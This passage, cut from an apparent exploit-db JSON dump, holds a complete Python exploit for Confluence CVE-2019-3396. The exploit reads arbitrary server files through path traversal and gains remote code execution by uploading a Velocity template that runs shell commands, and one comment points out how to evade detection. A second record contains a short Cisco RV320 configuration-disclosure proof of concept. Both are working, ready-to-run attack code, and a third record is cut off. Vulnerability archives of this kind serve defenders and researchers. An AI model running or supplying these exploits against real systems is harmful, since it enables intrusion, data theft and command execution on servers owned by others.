https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n# Version: 6.12.1\r\n# Tested on: Ubuntu 20.04.1 LTS\r\n# CVE : CVE-2019-3396\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: UTF-8 -*-\r\n\"\"\"\r\n\r\nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian\r\nConfluence Server server-side template injection.\r\n\r\nVulnerability information:\r\n Authors:\r\n Daniil Dmitriev - Discovering vulnerability\r\n Dmitry (rrock) Shchannikov - Metasploit module\r\n Exploit\r\n ExploitDB:\r\n https://www.exploit-db.com/exploits/46731\r\n Metasploit\r\n https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/\r\n exploit/multi/http/confluence_widget_connector\r\n\r\nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made\r\nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being\r\nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all\r\noutbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this\r\nalternative approach by first uploading the template to the server and then loading it with original vulnerability from\r\nlocal file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any\r\nuser can upload a file to the server by attaching the file to his \"personal space\".\r\n\r\nThere are two modes of the exploit:\r\n 1. Exploiting path traversal for file disclosure and directory listings.\r\n 2. RCE by uploading a template file with payload to the server.\r\n\r\nIn case where network is filtered and loading remote template is not possible and also you do not have a low-privileged\r\nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode\r\nof this exploit. Conveniently, application returns file content as well as directory listing depending on to what path\r\nis pointing to. As in original exploit no authentication is needed for this mode.\r\n\r\nLimitations of path traversal exploit:\r\n- not possible to distinguish between non-existent path and lack of permissions\r\n- no distinction between files and directories in the output\r\n\r\nIf you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A\r\nregular user probably has enough privileges for this since each user can have their own personal space where they\r\nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not\r\nexists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file\r\nwith payload from local filesystem instead from remote system.\r\n\r\nPrerequisite of RCE in this exploit:\r\n- authenticated session is needed\r\n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode\r\nto find it, should be in Confluence install directory under ./attachments subdirectory\r\n\r\nUsage\r\n- list /etc folder on Confluence server hosted on http://confluence.example.com\r\n python exploit.py -th confluence.example.com fs /etc\r\n- get content of /etc/passwd on same server but through a proxy\r\n python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd\r\n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using\r\nexisting session)\r\n python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\"\r\n\r\nTested on Confluence versions:\r\n 6.12.1\r\n\r\nTo test the exploit:\r\n 1. Download Confluence trial version for version 6.12.1\r\n https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin\r\n (to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser\r\n network tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and\r\n change the version in URL to be 6.12.1)\r\n SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin\r\n 2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default.\r\n chmod +x atlassian-confluence-6.12.1-x64.bin\r\n sudo ./atlassian-confluence-6.12.1-x64.bin\r\n 3. Open the browser to configure initial installation, when you get to license window copy the server ID.\r\n 4. Create account at https://my.atlassian.com/ and request for new trial license using server ID.\r\n 5. Activate the license and finish the installation with default options.\r\n 6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the\r\n exploit.\r\n 7. Run the exploit (see usage above).\r\n\"\"\"\r\n\r\n__version__ = \"1.0.0\"\r\n__author__ = \"46o60\"\r\n\r\nimport argparse\r\nimport logging\r\nimport requests\r\nimport urllib3\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport json\r\nimport random\r\nimport string\r\n\r\n# script and banner\r\nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\"\r\nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \r\n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \r\n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \r\n \r\n\"\"\"\r\n\r\n# turn off requests log output\r\nurllib3.disable_warnings()\r\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\r\n\r\n\r\ndef print_banner():\r\n \"\"\"\r\n Prints script ASCII banner and basic information.\r\n\r\n Because it is cool.\r\n \"\"\"\r\n print(ASCII_BANNER_TEXT)\r\n print(\"{} v{}\".format(SCRIPT_NAME, __version__))\r\n print(\"Author: {}\".format(__author__))\r\n print()\r\n\r\n\r\ndef exit_log(logger, message):\r\n \"\"\"\r\n Utility function to log exit message and finish the script.\r\n \"\"\"\r\n logger.error(message)\r\n exit(1)\r\n\r\n\r\ndef check_cookie_format(value):\r\n \"\"\"\r\n Checks if value is in format: ^[^=]+=[^=]+$\r\n \"\"\"\r\n pattern = r\"^[^=]+=[^=]+$\"\r\n if not re.match(pattern, value):\r\n raise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\")\r\n return value\r\n\r\n\r\ndef parse_arguments():\r\n \"\"\"\r\n Performs parsing of script arguments.\r\n \"\"\"\r\n # creating parser\r\n parser = argparse.ArgumentParser(\r\n prog=SCRIPT_NAME,\r\n description=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\"\r\n )\r\n\r\n # general script arguments\r\n parser.add_argument(\r\n \"-V\", \"--version\",\r\n help=\"displays the current version of the script\",\r\n action=\"version\",\r\n version=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__)\r\n )\r\n parser.add_argument(\r\n \"-v\", \"--verbosity\",\r\n help=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\",\r\n action=\"count\",\r\n default=0\r\n )\r\n parser.add_argument(\r\n \"-sb\", \"--skip-banner\",\r\n help=\"skips printing of the banner\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-s\", \"--silent\",\r\n help=\"do not output results of the exploit to standard output\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n parser.add_argument(\r\n \"-q\", \"--quiet\",\r\n help=\"do not output any logs\",\r\n action=\"store_true\",\r\n default=False\r\n )\r\n\r\n # arguments for input\r\n parser.add_argument(\r\n \"-px\", \"--proxy\",\r\n help=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\"\r\n )\r\n parser.add_argument(\r\n \"-t\", \"--tls\",\r\n help=\"use HTTPS protocol, default behaviour is to use plain HTTP\",\r\n action=\"store_true\"\r\n )\r\n parser.add_argument(\r\n \"-th\", \"--target-host\",\r\n help=\"target hostname/domain\",\r\n required=True\r\n )\r\n parser.add_argument(\r\n \"-p\", \"--port\",\r\n help=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\"\r\n )\r\n\r\n # two different sub commands\r\n subparsers = parser.add_subparsers(\r\n title=\"actions\",\r\n description=\"different behaviours of the script\",\r\n help=\"for detail description of available action options invoke -h for each individual action\",\r\n dest=\"action\"\r\n )\r\n\r\n # only exploring file system by disclosure of files and directories\r\n parser_file_system = subparsers.add_parser(\r\n \"fs\",\r\n help=\"use the exploit to browse local file system on the target endpoint\"\r\n )\r\n parser_file_system.add_argument(\r\n \"path\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_file_system.set_defaults(func=exploit_path_traversal)\r\n\r\n # using file upload to deploy payload and achieve RCE\r\n parser_rce = subparsers.add_parser(\r\n \"rce\",\r\n help=\"use the exploit to upload a template \"\r\n )\r\n parser_rce.add_argument(\r\n \"-hd\", \"--home-directory\",\r\n help=\"Confluence home directory on the server\"\r\n )\r\n parser_rce.add_argument(\r\n \"-c\", \"--cookie\",\r\n help=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \"\r\n \"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\",\r\n type=check_cookie_format,\r\n required=True\r\n )\r\n parser_rce.add_argument(\r\n \"command\",\r\n help=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\"\r\n )\r\n parser_rce.set_defaults(func=exploit_rce)\r\n\r\n # parsing\r\n arguments = parser.parse_args()\r\n\r\n return arguments\r\n\r\n\r\nclass Configuration:\r\n \"\"\"\r\n Represents all supported configuration items.\r\n \"\"\"\r\n\r\n # Parse arguments and set all configuration variables\r\n def __init__(self, script_args):\r\n self.script_arguments = script_args\r\n\r\n # setting input arguments\r\n self._proxy = self.script_arguments.proxy\r\n self._target_protocol = \"https\" if self.script_arguments.tls else \"http\"\r\n self._target_host = self.script_arguments.target_host\r\n self._target_port = self.script_arguments.port if self.script_arguments.port else \\\r\n 443 if self.script_arguments.tls else 80\r\n\r\n @staticmethod\r\n def get_logger(verbosity):\r\n \"\"\"\r\n Prepares logger to output to stdout with appropriate verbosity.\r\n \"\"\"\r\n logger = logging.getLogger()\r\n # default logging level\r\n logger.setLevel(logging.DEBUG)\r\n\r\n # Definition of logging to console\r\n ch = logging.StreamHandler()\r\n # specific logging level for console\r\n if verbosity == 0:\r\n ch.setLevel(logging.INFO)\r\n elif verbosity > 0:\r\n ch.setLevel(logging.DEBUG)\r\n\r\n # formatting\r\n class MyFormatter(logging.Formatter):\r\n\r\n default_fmt = logging.Formatter('[?] %(message)s')\r\n info_fmt = logging.Formatter('[+] %(message)s')\r\n error_fmt = logging.Formatter('[-] %(message)s')\r\n warning_fmt = logging.Formatter('[!] %(message)s')\r\n debug_fmt = logging.Formatter('>>> %(message)s')\r\n\r\n def format(self, record):\r\n if record.levelno == logging.INFO:\r\n return self.info_fmt.format(record)\r\n elif record.levelno == logging.ERROR:\r\n return self.error_fmt.format(record)\r\n elif record.levelno == logging.WARNING:\r\n return self.warning_fmt.format(record)\r\n elif record.levelno == logging.DEBUG:\r\n return self.debug_fmt.format(record)\r\n else:\r\n return self.default_fmt.format(record)\r\n\r\n ch.setFormatter(MyFormatter())\r\n\r\n # adding handler\r\n logger.addHandler(ch)\r\n\r\n return logger\r\n\r\n # Properties\r\n @property\r\n def endpoint(self):\r\n if not self._target_protocol or not self._target_host or not self._target_port:\r\n exit_log(log, \"failed to generate endpoint URL\")\r\n return f\"{self._target_protocol}://{self._target_host}:{self._target_port}\"\r\n\r\n @property\r\n def remote_path(self):\r\n return self.script_arguments.path\r\n\r\n @property\r\n def attachment_dir(self):\r\n home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\\r\n Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR\r\n return f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\"\r\n\r\n @property\r\n def rce_command(self):\r\n return self.script_arguments.command\r\n\r\n @property\r\n def session_cookie(self):\r\n if not self.script_arguments.cookie:\r\n return None\r\n parts = self.script_arguments.cookie.split(\"=\")\r\n return {\r\n parts[0]: parts[1]\r\n }\r\n\r\n @property\r\n def proxies(self):\r\n return {\r\n \"http\": self._proxy,\r\n \"https\": self._proxy\r\n }\r\n\r\n\r\nclass Exploit:\r\n \"\"\"\r\n This class represents actual exploit towards the target Confluence server.\r\n \"\"\"\r\n # used for both path traversal and RCE\r\n DEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\"\r\n\r\n # used only for RCE\r\n CREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\"\r\n PERSONAL_SPACE_KEY_PATH = \"/index.action\"\r\n PERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\"\r\n PERSONAL_SPACE_ID_PATH = \"/rest/api/space\"\r\n PERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\"\r\n HOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\"\r\n ATL_TOKEN_PATH = \"/pages/viewpageattachments.action\"\r\n FILE_UPLOAD_PATH = \"/pages/doattachfile.action\"\r\n # file name has no real significance, file is identified on file system by it's ID\r\n # (change only if you want to avoid detection)\r\n DEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format(\r\n ''.join(random.choice(string.ascii_lowercase) for i in range(5))\r\n ) # the extension .vm is not really needed, remove it if you have problems uploading the template\r\n DEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\"\r\n DEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\"\r\n # using random name for uploaded file so it will always be first version of the file\r\n DEFAULT_FILE_VERSION = \"1\"\r\n\r\n def __init__(self, config):\r\n \"\"\"\r\n Runs the exploit towards target_url.\r\n \"\"\"\r\n self._config = config\r\n\r\n self._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\"\r\n\r\n if self._config.script_arguments.action == \"rce\":\r\n self._root_url = f\"{self._config.endpoint}/\"\r\n self._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\"\r\n self._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\"\r\n\r\n # Following data will be dynamically created while exploit is running\r\n self._space_key = None\r\n self._personal_space_id_url = None\r\n self._space_id = None\r\n self._homepage_id = None\r\n self._atl_token_url = None\r\n self._atl_token = None\r\n self._upload_url = None\r\n self._file_id = None\r\n\r\n def generate_payload_location(self):\r\n \"\"\"\r\n Generates location on file system for uploaded attachment based on Confluence Ver003 scheme.\r\n\r\n See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html\r\n \"\"\"\r\n if not self._space_id or not self._homepage_id or not self._file_id:\r\n exit_log(log, \"cannot generate payload location without space, homepage and file ID\")\r\n\r\n space_folder_one = str(int(self._space_id[-3:]) % 250)\r\n space_folder_two = str(int(self._space_id[-6:-3]) % 250)\r\n space_folder_three = self._space_id\r\n page_folder_one = str(int(self._homepage_id[-3:]) % 250)\r\n page_folder_two = str(int(self._homepage_id[-6:-3]) % 250)\r\n page_folder_three = self._homepage_id\r\n file_folder = self._file_id\r\n version = Exploit.DEFAULT_FILE_VERSION\r\n\r\n payload_location = f\"{self._config.attachment_dir}/\" \\\r\n f\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\\r\n f\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\\r\n f\"{file_folder}/{version}\"\r\n log.debug(f\"generated payload location: {payload_location}\")\r\n\r\n return payload_location\r\n\r\n def path_traversal(self, target_remote_path, decode_output=False):\r\n \"\"\"\r\n Uses vulnerability in _template parameter to achieve path traversal.\r\n\r\n Args:\r\n target_remote_path (string): path on local file system of the target application\r\n decode_output (bool): set to True if output of the file will be character codes separated by new lines,\r\n used with RCE\r\n \"\"\"\r\n post_data = {\r\n \"contentId\": str(random.randint(1, 10000)),\r\n \"macro\": {\r\n \"body\": \"\",\r\n \"name\": \"widget\",\r\n \"params\": {\r\n \"_template\": f\"file://{target_remote_path}\",\r\n \"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice(\r\n string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11))\r\n }\r\n }\r\n }\r\n\r\n log.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\")\r\n response = requests.post(\r\n self._target_url,\r\n headers={\r\n \"Content-Type\": \"application/json; charset=utf-8\"\r\n },\r\n json=post_data,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"exploit failed\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve\r\n # the requested path\r\n error_element = soup.find_all(\"div\", \"widget-error\")\r\n if error_element:\r\n log.warning(\"failed to retrieve target path on the system\")\r\n log.warning(\"target path does not exist or application does not have appropriate permissions to view it\")\r\n return \"\"\r\n else:\r\n # otherwise parse out the actual response (file content or directory listing)\r\n output_element = soup.find_all(\"div\", \"wiki-content\")\r\n\r\n if not output_element:\r\n exit_log(log, \"application did not return appropriate HTML element\")\r\n if not len(output_element) == 1:\r\n log.warning(\"application unexpectedly returned multiple HTML elements, using the first one\")\r\n output_element = output_element[0]\r\n\r\n log.debug(\"extracting HTML element value and stripping the leading and trailing spaces\")\r\n # output = output_element.string.strip()\r\n output = output_element.decode_contents().strip()\r\n\r\n if \"The macro 'widget' is unknown. It may have been removed from the system.\" in output:\r\n exit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\")\r\n\r\n if not self._config.script_arguments.silent:\r\n if decode_output:\r\n parsed_output = \"\"\r\n p = re.compile(r\"^([0-9]+)\")\r\n for line in output.split(\"\\n\"):\r\n r = p.match(line)\r\n if r:\r\n parsed_output += chr(int(r.group(1)))\r\n print(parsed_output.strip())\r\n else:\r\n print(output)\r\n\r\n return output\r\n\r\n def find_personal_space_key(self):\r\n \"\"\"\r\n Makes request that will return personal space key in the response.\r\n \"\"\"\r\n log.debug(\"checking if user has personal space\")\r\n response = requests.get(\r\n self._root_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n )\r\n page_content = response.text\r\n if \"Add personal space\" in page_content:\r\n log.info(f\"user does not have personal space, creating it now...\")\r\n\r\n response = requests.post(\r\n self._create_personal_space_url,\r\n headers={\r\n \"Content-Type\": \"application/json\"\r\n },\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n json={\r\n \"spaceUserKey\": \"\"\r\n }\r\n )\r\n\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to create personal space\")\r\n\r\n log.debug(f\"personal space created\")\r\n response_data = response.json()\r\n self._space_key = response_data.get(\"key\")\r\n else:\r\n log.info(\"sending request to find personal space key\")\r\n response = requests.get(\r\n self._personal_space_key_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n personal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\")\r\n if not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"):\r\n exit_log(log, \"failed to find personal space link in the response, does the user have personal space?\")\r\n path = personal_space_link_element[\"href\"]\r\n p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX)\r\n r = p.match(path)\r\n if r:\r\n self._space_key = r.group(1)\r\n else:\r\n exit_log(log, \"failed to find personal space key\")\r\n\r\n log.debug(f\"personal space key: {self._space_key}\")\r\n self._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\\r\n f\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\"\r\n log.debug(f\"generated personal space id url: {self._personal_space_id_url}\")\r\n\r\n def find_personal_space_id_and_homepage_id(self):\r\n \"\"\"\r\n Makes request that will return personal space ID and homepage ID in the response.\r\n \"\"\"\r\n if self._personal_space_id_url is None:\r\n exit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\")\r\n\r\n log.info(\"sending request to find personal space ID and homepage\")\r\n response = requests.get(\r\n self._personal_space_id_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is JSON\r\n data = json.loads(page_content)\r\n\r\n if \"results\" not in data:\r\n exit_log(log, \"failed to find 'result' section in json output\")\r\n items = data[\"results\"]\r\n if type(items) is not list or len(items) == 0:\r\n exit_log(log, \"no results for personal space id\")\r\n personal_space_data = items[0]\r\n if \"id\" not in personal_space_data:\r\n exit_log(log, \"failed to find ID in personal space data\")\r\n self._space_id = str(personal_space_data[\"id\"])\r\n log.debug(f\"found space id: {self._space_id}\")\r\n if \"_expandable\" not in personal_space_data:\r\n exit_log(log, \"failed to find '_expandable' section in personal space data\")\r\n personal_space_expandable_data = personal_space_data[\"_expandable\"]\r\n if \"homepage\" not in personal_space_expandable_data:\r\n exit_log(log, \"failed to find homepage in personal space expandable data\")\r\n homepage_path = personal_space_expandable_data[\"homepage\"]\r\n p = re.compile(Exploit.HOMEPAGE_REGEX)\r\n r = p.match(homepage_path)\r\n if r:\r\n self._homepage_id = r.group(1)\r\n log.debug(f\"found homepage id: {self._homepage_id}\")\r\n self._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\"\r\n log.debug(f\"generated atl token url: {self._atl_token_url}\")\r\n self._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\"\r\n log.debug(f\"generated upload url: {self._upload_url}\")\r\n else:\r\n exit_log(log, \"failed to find homepage id, homepage path has incorrect format\")\r\n\r\n def get_csrf_token(self):\r\n \"\"\"\r\n Makes request to get the current CSRF token for the session.\r\n \"\"\"\r\n if self._atl_token_url is None:\r\n exit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\")\r\n\r\n log.info(\"sending request to find CSRF token\")\r\n response = requests.get(\r\n self._atl_token_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n allow_redirects=False\r\n )\r\n\r\n # check if response was proper...\r\n if not response.status_code == 200:\r\n log.debug(f\"response code: {response.status_code}\")\r\n exit_log(log, \"failed to get personal space key\")\r\n\r\n page_content = response.content\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n atl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"})\r\n if not atl_token_element.has_attr(\"value\"):\r\n exit_log(log, \"failed to find value for atl_token\")\r\n self._atl_token = atl_token_element[\"value\"]\r\n log.debug(f\"found CSRF token: {self._atl_token}\")\r\n\r\n def upload_template(self):\r\n \"\"\"\r\n Makes multipart request to upload the template file to the server.\r\n \"\"\"\r\n log.info(\"uploading template to server\")\r\n if not self._atl_token:\r\n exit_log(log, \"cannot upload a file without CSRF token\")\r\n if self._upload_url is None:\r\n exit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\")\r\n\r\n # Velocity template here executes command and then captures the output. Here the output is generated by printing\r\n # character codes one by one in each line. This can be improved for sure but did not have time to investigate\r\n # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern\r\n # webapp' was not working properly. This gets decoded on our python client later.\r\n template = f\"\"\"#set( $test = \"test\" )\r\n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\"))\r\n#set($exout = $ex.waitFor())\r\n#set($out = $ex.getInputStream())\r\n#foreach($i in [1..$out.available()])\r\n#set($ch = $out.read())\r\n$ch\r\n#end\"\"\"\r\n\r\n log.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\")\r\n parts = {\r\n \"atl_token\": (None, self._atl_token),\r\n \"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template),\r\n \"confirm\": \"Attach\"\r\n }\r\n response = requests.post(\r\n self._upload_url,\r\n cookies=self._config.session_cookie,\r\n proxies=self._config.proxies,\r\n verify=False,\r\n files=parts\r\n )\r\n\r\n # for successful upload first a 302 response needs to happen then 200 page is returned with file ID\r\n if response.status_code == 403:\r\n exit_log(log, \"got 403, probably problem with CSRF token\")\r\n if not len(response.history) == 1 or not response.history[0].status_code == 302:\r\n exit_log(log, \"failed to upload the payload\")\r\n\r\n page_content = response.content\r\n\r\n if \"Upload Failed\" in str(page_content):\r\n exit_log(log, \"failed to upload template\")\r\n\r\n # response is HTML\r\n soup = BeautifulSoup(page_content, features=\"html.parser\")\r\n\r\n file_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME})\r\n if not file_link_element.has_attr(\"data-linked-resource-id\"):\r\n exit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\")\r\n self._file_id = file_link_element[\"data-linked-resource-id\"]\r\n log.debug(f\"found file ID: {self._file_id}\")\r\n\r\n\r\ndef exploit_path_traversal(config):\r\n \"\"\"\r\n This sends one request towards vulnerable server to either get local file content or directory listing.\r\n \"\"\"\r\n log.debug(\"running path traversal exploit\")\r\n\r\n exploit = Exploit(config)\r\n exploit.path_traversal(config.remote_path)\r\n\r\n\r\ndef exploit_rce(config):\r\n \"\"\"This executes multiple steps to gain RCE. Requires a session token.\r\n\r\n Steps:\r\n 1. find personal space key for the user\r\n 2. find personal space ID and homepage ID for the user\r\n 3. get CSRF token (generated per session)\r\n 4. upload template file with Java code (involves two requests, first one is 302 redirection)\r\n 5. use path traversal part of exploit to load and execute local template file\r\n 6. profit\r\n \"\"\"\r\n log.debug(\"running RCE exploit\")\r\n\r\n exploit = Exploit(config)\r\n exploit.find_personal_space_key()\r\n exploit.find_personal_space_id_and_homepage_id()\r\n exploit.get_csrf_token()\r\n exploit.upload_template()\r\n payload_location = exploit.generate_payload_location()\r\n exploit.path_traversal(payload_location, decode_output=True)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # parse arguments and load all configuration items\r\n script_arguments = parse_arguments()\r\n log = Configuration.get_logger(script_arguments.verbosity)\r\n\r\n configuration = Configuration(script_arguments)\r\n\r\n # printing banner\r\n if not configuration.script_arguments.skip_banner:\r\n print_banner()\r\n\r\n if script_arguments.quiet:\r\n log.disabled = True\r\n\r\n log.debug(\"finished parsing CLI arguments\")\r\n log.debug(\"configuration was loaded successfully\")\r\n log.debug(\"starting exploit\")\r\n\r\n # disabling warning about trusting self sign certificate from python requests\r\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\n # run appropriate function depending on mode\r\n configuration.script_arguments.func(configuration)\r\n\r\n log.debug(\"done!\")", "sourceHref": "https://www.exploit-db.com/download/49465", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T06:11:20", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-01-28T00:00:00", "type": "exploitdb", "title": "Cisco RV300 / RV320 - Information Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-1653", "CVE-2019-1653"], "modified": "2019-01-28T00:00:00", "id": "EDB-ID:46262", "href": "https://www.exploit-db.com/exploits/46262", "sourceData": "# Exploit Title: 6coRV Exploit\r\n# Date: 01-26-2018\r\n# Exploit Author: Harom Ramos [Horus]\r\n# Tested on: Cisco RV300/RV320\r\n# CVE : CVE-2019-1653\r\n\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nfrom fake_useragent import UserAgent\r\n\r\ndef random_headers():\r\n return dict({'user-agent': UserAgent().random})\r\n\r\ndef request(url):\r\n r = requests.Session()\r\n try:\r\n get = r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False\r\n if get.status_code == 200: \r\n return get.text \r\n except requests.ConnectionError:\r\n return 'Error Conecting'\r\n except requests.Timeout:\r\n\t return 'Error Timeout'\r\n except KeyboardInterrupt:\r\n raise \r\n except:\r\n return 0\r\n\r\nprint(\"\") \r\nprint(\"##################################################\")\r\nprint(\"CISCO CVE-2019-1653 POC\")\r\nprint(\"From H. with love\")\r\nprint(\"\")\r\n\r\nurl = raw_input(\"URL> EX:http://url:port/ \") \r\nurl = url + \"/cgi-bin/config.exp\"\r\nprint(request(url))", "sourceHref": "https://www.exploit-db.com/download/46262", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T06:07:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 